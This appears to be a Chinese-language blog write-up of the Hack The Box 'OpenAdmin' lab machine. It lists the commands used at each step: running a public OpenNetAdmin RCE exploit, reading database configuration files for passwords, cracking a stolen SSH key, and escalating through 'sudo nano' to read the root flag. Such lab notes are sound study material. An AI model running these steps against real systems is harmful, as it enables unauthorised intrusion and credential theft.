OpenAdmin(HTB)
in Study on Htb
转移了OneNote中的文章 还木有配图
信息搜集
dirb扫描发现 http://10.10.10.171/artwork 和 http://10.10.10.171/music/ artwork中无明显漏洞 music的login可以以guest方式登录
点击右上角切换用户 admin:admin直接登录 但也没什么用 根据页面标题 searchsploit opennetadmin 发现该版本存在RCE
openadmin rce
mkdir OpenAdmin && cd OpenAdmin && searchsploit -m 47691 && dos2unix 47691.sh
./47691.sh http://10.10.10.171/ona/login.php
拿到www-data权限
拿普通用户权限
发现存在用户jimmy和joanna
ls /opt/ona/www/local/config/
cat /opt/ona/www/local/config/database_settings.inc.php
查看配置文件 发现数据库用户和密码
cat /etc/apache2/sites-available/openadmin.conf
发现ServerAdmin jimmy@openadmin.htb
尝试使用该密码登录jimmy成功 但没有user.txt
继续寻找 发现/var/www 目录下 有所有者为Jimmy的文件夹
ls /etc/apache2/sites-available/
通过internal.conf了解到 原来internal是跑在127.0.0.1:52846上的WEB服务
curl http://127.0.0.1:52846/main.php
拿到joanna的id_rsa 破解密钥密码
/usr/share/john/ssh2john.py id_rsa > hash
登录 拿到user权限
提权
sudo -l
sudo /bin/nano /opt/priv
Ctrl+R /root/root.txt
拿到root权限
